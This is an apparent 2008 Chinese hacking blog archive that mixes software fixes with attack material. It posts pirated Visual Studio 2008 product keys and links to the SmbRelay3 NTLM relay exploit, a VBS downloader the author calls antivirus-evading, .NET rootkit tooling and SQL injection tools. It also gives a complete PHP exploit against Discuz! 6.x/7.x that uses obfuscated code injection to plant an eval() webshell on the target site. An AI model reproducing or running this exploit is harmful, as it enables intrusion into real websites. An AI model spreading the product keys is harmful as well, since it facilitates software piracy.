Bin-Blog

解决VMware6.5导致VS2005,VS2008编译自动退出问题

2008-11-18T20:25:24+08:00

  好不容易把VS2008装上了，每次F5编译的时候，程序自动退出，意外的是VS2005也是同样的结果。好在有像我一样的好心人，愿意把解决的方法与大家共享。

  经过搜索找到了答案，原来是VMware6.5搞的鬼，安装了VMware6.5之后在VS上面多了一个标签
  vs2008解决方法：
    将HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VisualStudio\9.0\AddIns\VMDebugger.Connect目录下把LoadBehavior项改为0即可。
  vs2005解决方法：
    将HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VisualStudio\8.0\AddIns\VMDebugger.Connect目录下把LoadBehavior项改为0即可。

   现在可以放心的使用了。：）

VS2008 Professional 升级为正式版

2008-11-18T20:13:57+08:00

虽然VS2008已经现身很久了，我今天才决定装上测试下，从微软的官方下载了测试版，90天的体验时间，无法满足个人需求啊。经过百度找到答案，与看官分享。

先安装试用版，然后在“添加或删除程序”里找到VS2008，点“更改/删除”就会看到一个输入序列号的地方，把序列号输进去，点“升级”按钮即可，Team Suite和Professional通用。

Visual Studio 2008 Professional Edition(iso) 微软官方下载

1.Visual Studio 2008 Professional Edition:
XMQ2Y-4T3V6-XJ48Y-D3K2V-6C4WT （测试成功）

2.Visual Studio 2008 Team Test Load Agent:
WPX3J-BXC3W-BPYWP-PJ8CM-F7M8T

3.Visual Studio 2008 Team System:
PYHYP-WXB3B-B2CCM-V9DX9-VDY8T

4.Visual Studio 2008 Team Foundation Server:
WPDW8-M962C-VJX9M-HQB4Q-JVTDM

SmbRelay3 NTLM Replay Attack Tool/Exploit MS08-068

2008-11-16T18:01:44+08:00

* SMBRELAY 3 - NTLM replay attack (version 1.0 ) public version
* (c) 2008 Andres Tarasco Acuña ( atarasco _at_ gmail.com )
* URL: http://tarasco.org/Web/tools.html

http://milw0rm.com/sploits/2008-smbrelay3.zip

# milw0rm.com [2008-11-14]

一个VBS下载者生成器

2008-11-16T17:45:54+08:00

  内网的时候也许会用的上，代码应该是免杀的，但是主动防御就不好说了，第一个是下载，执行，然后自删除。第二个是下载，不执行，然后自删除，路径可以是绝对路径，如果只填写文件名则保存到down.vbs同目录下。


  Bin的VBS下载者

再次被人冤枉。。。。。。

2008-11-16T15:06:54+08:00

希望网站被搞的站长的素质有所提高，最重要的是逻辑思维要增强啊！哪怕是最简单的分析问题能力，下次最好把域名也留下，让大家帮你看看漏洞在哪，别说几句就跑了。

Discuz! 6.x/7.x SODB-2008-13 Exp

2008-11-14T20:36:38+08:00

程序代码

#!/usr/bin/php
/**
* Discuz! 6.x/7.x SODB-2008-13 Exp
* By www.80vul.com
* 文件中注释的变量值请自行修改
*/

$host = 'www.80vul.com';
// 服务器域名或IP
$path = '/discuz/';
// 程序所在的路径
$key = 0;
// 上面的变量编辑好后，请将此处的值改为1

if (strpos($host, '://') !== false || strpos($path, '/') === false || $key !== 1)
exit("专业点好不,先看看里面的注释 -,-\n");

error_reporting(7);
ini_set('max_execution_time', 0);

$key = time();
$cmd = 'action=register&username='.$key.'&password='.$key.'&email='.$key.'@80vul.com&_DCACHE=1';
$resp = send();

preg_match('/logout=yes&formhash=[a-z0-9]{8}&sid=([a-zA-Z0-9]{6})/', $resp, $sid);

if (!$sid)
exit("哦,大概是没有开启WAP注册吧 -,-\n");

$cmd = 'stylejump[1]=1&styleid=1&inajax=1&transsidstatus=1&sid='.$sid[1].'&creditsformula=${${fputs(fopen(chr(46).chr(46).chr(47).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(101).chr(118).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(56).chr(48).chr(118).chr(117).chr(108))}}';
send();

$shell = 'http://'.$host.$path.'forumdata/cache/eval.php';

if (file_get_contents($shell) == '80vul')
exit("好了,去看看你的WebShell吧:\t$shell\n里面的代码是:\t\n别告诉我你不会用 -,-\n");
else
exit("嗯,大概是该网站不存在漏洞,换一个吧 -,-\n");

function send()
{
global $host, $path, $url, $cmd;

$data = "POST ".$path."wap/index.php HTTP/1.1\r\n";
$data .= "Accept: */*\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Referer: http://$host$path\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1\r\n";
$data .= "Host: $host\r\n";
$data .= "Connection: Close\r\n";
$data .= "Content-Length: ".strlen($cmd)."\r\n\r\n";
$data .= $cmd;

$fp = fsockopen($host, 80);
fputs($fp, $data);

$resp = '';

while ($fp && !feof($fp))
$resp .= fread($fp, 1024);

return $resp;
}

?>

.NET Framework Rootkits

2008-11-14T13:13:01+08:00

This page covers a new method that enables an attacker to change the .NET language, and to hide malicious code inside its core.

The whitepaper .NET Framework rootkits - backdoors inside your framework covers various ways to develop rootkits for the .NET framework, so that every EXE/DLL that runs on a modified Framework will behave differently than what it's supposed to do. Code reviews will not detect backdoors installed inside the Framework since the payload is not in the code itself, but rather it is inside the Framework implementation. Writing Framework rootkits will enable the attacker to install a reverse shell inside the framework, to steal valuable information, to fixate encryption keys, disable security checks and to perform other nasty things as described in this paper.

A Presentation on this topic is also available.

This paper also introduces .NET-Sploit 1.0 beta - a new tool for building MSIL rootkits that will enable the user to inject preloaded/custom payload to the Framework core DLL.

Here you can also find the Source Code of .NET-Sploit 1.0 beta and Modules for .NET-Sploit 1.0 beta(optional)

Download

在windows2003里安装photoshop CS3 的方法

2008-11-12T11:24:14+08:00

  今天急需安装PhotoShop cs3 ，在win2003下安装还是第一次，居然不让安装，还是求助百度大哥吧。关键时刻真给面子啊。

  简述方法：
  第一种方法：(已经测试成功！)

当你解压后请找到此目录

Adobe CS3\Photoshop\Adobe CS3\payloads\AdobePhotoshop10en_US_volume
下的
AdobePhotoshop10en_US_volume.proxy.xml 文件,用记录本打开,,走到文件尾,,你可看到

     [

       {"OS":{"Macintosh":{"Require":[{"Version":"10.4.8"}],"Exclude":[{"Version":"10.4.8"}]},"Windows":{"XP":{"Exclude":true,"Require":{"MinServicePack":"2","@servicePack64Bit":1
,"Need64Bit":"0"}},"Server2003":{"Exclude":true},"Vista":{"Require":true}}}
       }
]

这对标签改为
     [

       {"OS":{"Macintosh":{"Require":[{"Version":"10.4.8"}],"Exclude":[{"Version":"10.4.8"}]},"Windows":{"XP":{"Exclude":true,"Require":{"MinServicePack":"2","@servicePack64Bit":1
,"Need64Bit":"0"}},"Server2003":{"Require":true},"Vista":{"Require":true}}}
       }
]

====================================================
第二种方法：

让PHOTOSHOP CS3 支持WIN2003操作系统：

现在PHOTOSHOP CS3发布了，但是却不支持WINDOWS 2003系统安装，这里给一个解决办法：

先找到安装程序目录payloads\AdobePhotoshop10en_US_volume\AdobePhotoshop10en_US_volume.proxy.xml

用记事本打开AdobePhotoshop10en_US_volume.proxy.xml文件,搜索Vista字样,找到后,把在前面的Server2003之间加一个空格,变成Server 2003,试一下,是不是可以安装了？

希望对WIN2003下需要安装PhotoShop的朋友有帮助：）

SQL-Helper 1.0 (SQLCancer) + Video

2008-11-11T20:48:51+08:00

作者：Reiluke(dsreiluke_at_gmail.com)

下载地址：
http://rapidshare.de/files/40875064/SQL-Helper_1.0___Video.rar.html
http://dl.free.fr/lmGvSKdWX
http://www.zshare.net/download/511371791d7111c

MYSQL Dumper

2008-11-11T20:33:05+08:00

开始收集和转载文章还有工具：）

作者：reiluke

下载